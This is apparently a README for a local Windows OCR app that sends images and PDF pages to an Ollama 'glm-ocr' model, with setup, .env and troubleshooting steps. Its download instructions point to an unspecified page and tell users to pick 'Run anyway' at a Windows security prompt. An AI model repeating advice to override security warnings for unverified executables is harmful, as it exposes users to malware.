Visit this page to download and run the app on Windows:
-
Open the download page in your web browser.
-
Download the Windows version of the app from the page.
-
If the file is in a ZIP folder, right-click it and choose Extract All.
-
Open the extracted folder.
-
Double-click the app file to start it.
-
If Windows shows a security prompt, choose More info and then Run anyway.
-
Keep the app open in your browser or desktop window.
-
Open Ollama if the app asks for it.
- Upload an image or PDF
- Turn PDF pages into images before OCR
- Send the image to an OCR model
- Stream the text back into the page
- Show the result as markdown
- A Windows computer
- Internet access for the first download
- Ollama installed on your computer
- The
glm-ocrmodel - A modern web browser like Chrome, Edge, or Firefox
-
Install Ollama from the official Ollama site.
-
Open Ollama after install.
-
Pull the OCR model with this command:
ollama pull glm-ocr-
Wait for the model to finish downloading.
-
Keep Ollama open while you use the app.
Use these steps if you want to run the app from source:
-
Install Node.js on your computer.
-
Download this repository.
-
Open a terminal in the project folder.
-
Install the app files:
npm install- Copy the example env file:
cp .env.example .env- Start the app:
npm run dev-
Open the local address shown in the terminal.
-
Upload an image or PDF.
-
Open the app.
-
Choose an image or PDF from your computer.
-
If you upload a PDF, the app shows one page at a time.
-
Move through the pages as needed.
-
Wait while the OCR model reads the file.
-
Read the text on the page as it appears.
-
Copy the result if you want to save it elsewhere.
When you upload a PDF, the app does not read the file as plain text.
It first renders the current page as an image.
Then it sends that image to the OCR model.
This helps with scanned PDFs, photos of pages, and files that do not contain selectable text.
You can set the default OCR connection in .env.
VITE_OCR_BASE_URL=/api/proxy
VITE_OCR_ENDPOINT=/api/generate
VITE_OCR_MODEL=glm-ocr
OCR_PROXY_TARGET=http://127.0.0.1:11434VITE_OCR_BASE_URL: The base path the app uses for OCR requestsVITE_OCR_ENDPOINT: The API path used to send OCR jobsVITE_OCR_MODEL: The model name the app sends to OllamaOCR_PROXY_TARGET: The local Ollama address on your computer
If the app does not work as expected, check these items:
-
Ollama is open and running.
-
The
glm-ocrmodel is installed. -
The app can reach
http://127.0.0.1:11434. -
Your browser allows local app access.
-
You uploaded a supported file type such as PNG, JPG, JPEG, or PDF.
- PNG
- JPG
- JPEG
- Windows 10 or later
- 8 GB RAM or more
- A few GB of free disk space
- A GPU helps, but the app can run on CPU
- A stable local Ollama install
-
Download the app from the link above.
-
Install Ollama.
-
Pull
glm-ocr. -
Start Ollama.
-
Open the app.
-
Upload a file.
-
Read the OCR output in the page
This app helps you test OCR on local files without sending them to a cloud service.
It is useful for scanned documents, screenshots, and PDFs that need text extraction
Visit this page to download and run the app on Windows: